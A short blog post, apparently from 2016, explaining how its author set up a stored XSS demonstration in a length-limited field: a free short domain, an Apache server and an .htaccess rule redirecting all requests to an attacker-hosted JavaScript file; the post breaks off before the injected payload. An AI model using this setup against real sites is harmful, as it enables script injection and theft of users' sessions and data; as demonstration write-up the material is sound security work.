Tuesday, January 5, 2016

xss-script injection if size matters...

Wanted to demonstrate a stored XSS vulnerability, with less space in the vulnerable field.
(In this case <script> tags was filtered so I had to use JQUERY)

Registered a .cf domain (4 characters domains are free) at http://www.freenom.com/ 

Set up an Apache and pointed whw3.cf to it.

Configure Apache to redirect / to my JavaScript file
.htaccess rewrite:

Options +FollowSymLinks
RewriteEngine on
RewriteCond %{REQUEST_URI} !^/a.js
RewriteRule ^(.*)$ http://%{HTTP_HOST}/a.js [R=301,L]

Injected the following